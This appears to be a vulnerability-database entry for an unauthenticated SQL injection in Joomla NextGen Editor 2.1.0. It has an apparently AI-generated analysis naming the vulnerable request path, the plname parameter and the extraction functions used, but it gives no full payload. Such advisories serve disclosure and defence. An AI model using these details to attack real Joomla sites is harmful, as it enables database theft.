Joomla NextGen Editor 2.1.0 SQL Injection via plname Parameter
Description
Joomla NextGen Editor 2.1.0 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL commands through the plname parameter. Attackers can send GET requests to index.php with option=com_nge&view=config and inject malicious SQL code in the plname parameter to extract sensitive database information.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
1- Range: 2.1.0
Patches
Vulnerability mechanics
Root cause
"Missing input validation in the plname GET parameter allows SQL injection into the Joomla NextGen Editor component's database queries."
Attack vector
An unauthenticated attacker sends a crafted GET request to `index.php` with `option=com_nge&view=config` and injects malicious SQL code into the `plname` parameter [ref_id=1]. The payload is URL-encoded and includes SQL comment markers and extraction functions such as `extractvalue` and `concat` to retrieve database version information [ref_id=1]. No authentication or session is required, making the attack trivially exploitable from any network position.
Affected code
The vulnerability is in the `plname` parameter processed by the `com_nge` component's `config` view within Joomla NextGen Editor 2.1.0 [ref_id=1]. The exact file path is not specified in the advisory, but the component's controller or model handling the `plname` input in a SQL query is the affected code path.
What the fix does
No patch is included in the bundle. The advisory [ref_id=1] does not provide a remediation, but the fix would require sanitizing or parameterizing the `plname` input before it is used in SQL queries within the `com_nge` component's `config` view. Without a published patch, users must disable or remove the extension until a vendor update is available.
Preconditions
- networkAttacker must be able to reach the Joomla web server over HTTP
- inputThe plname GET parameter must be present and unfiltered in the request
Generated on Jun 20, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
3- www.exploit-db.com/exploits/43365mitreexploit
- www.vulncheck.com/advisories/joomla-nextgen-editor-sql-injection-via-plname-parametermitrethird-party-advisory
- extensions.joomla.org/extension/nextgen-editor/mitreproduct
News mentions
0No linked articles in our index yet.